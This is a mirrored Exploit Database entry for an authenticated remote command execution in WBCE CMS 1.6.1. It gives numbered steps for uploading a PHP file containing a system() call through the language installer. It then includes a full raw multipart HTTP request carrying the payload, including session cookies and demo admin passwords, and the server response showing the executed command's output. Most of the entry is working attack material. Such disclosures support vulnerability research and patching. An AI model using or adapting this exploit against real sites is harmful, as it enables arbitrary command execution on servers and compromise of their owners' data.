WBCE CMS Version 1.6.1 – Remote Command Execution (Authenticated)

• Exploit Database
• 14 阅读

• 作者： tmrswrr
  日期： 2024-04-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51986/

• # Exploit Title: WBCE CMS Version : 1.6.1Remote Command Execution
  # Date: 30/11/2023
  # Exploit Author: tmrswrr
  # Vendor Homepage: https://wbce-cms.org/
  # Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.1.zip
  # Version: 1.6.1
  # Tested on: https://www.softaculous.com/apps/cms/WBCE_CMS
  
  ## POC:
  
  1 ) Login with admin cred and click Add-ons
  2 ) Click on Language > Install Language> https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php
  3 ) Upload upgrade.php > <?php echo system('id'); ?> , click install > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/install.php
  4 ) You will be see id command result 
  
  Result: 
  
  uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft) 
  
  ### Post Request:
  
  POST /WBCE_CMSgn4fqnl8mv/admin/languages/install.php HTTP/1.1
  Host: demos6.softaculous.com
  Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701347353.1.1.1701349000.0.0.0; _ga=GA1.1.1562523898.1701347353; AEFCookies1526[aefsid]=jefkds0yos40w5jpbhl6ue9tsbo2yhiq; demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22sid%22%3A549%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%5C%2Fadmin%5C%2F%22%2C%22dir_suffix%22%3A%22bybuxqthew%22%7D; demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%5C%2Fadmin%22%2C%22dir_suffix%22%3A%22gn4fqnl8mv%22%7D; phpsessid-5505-sid=576d8b8dd92f6cabe3a235cb359c9b34; WBCELastConnectJS=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23
  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php
  Content-Type: multipart/form-data; boundary=---------------------------86020911415982314764024459
  Content-Length: 522
  Origin: https://demos6.softaculous.com
  Dnt: 1
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: same-origin
  Sec-Fetch-User: ?1
  Te: trailers
  Connection: close
  
  -----------------------------86020911415982314764024459
  Content-Disposition: form-data; name="formtoken"
  
  5d3c9cef-003aaa0a62e1196ebda16a7aab9a0cf881b9370c
  -----------------------------86020911415982314764024459
  Content-Disposition: form-data; name="userfile"; filename="upgrade.php"
  Content-Type: application/x-php
  
  <?php echo system('id'); ?>
  
  -----------------------------86020911415982314764024459
  Content-Disposition: form-data; name="submit"
  
  
  -----------------------------86020911415982314764024459--
  
  ### Response : 
  
  <!-- ################### Up from here: Original Code from original template ########### -->
  
  <!-- senseless positioning-table: needed for old modules which base on class td.content -->
  <div class="row" style="overflow:visible">
  <div class="fg12">
  <table id="former_positioning_table">
  <tr>
  <td class="content">
  uid=1000(soft) gid=1000(soft) groups=1000(soft)
  uid=1000(soft) gid=1000(soft) groups=1000(soft)
  <div class="top alertbox_error fg12 error-box">
  <i class=" fa fa-2x fa-warning signal"></i>
  
  <p>Invalid WBCE CMS language file. Please check the text file.</p>
  
  <p><a href="https://www.exploit-db.com/exploits/51986/index.php" class="button">Back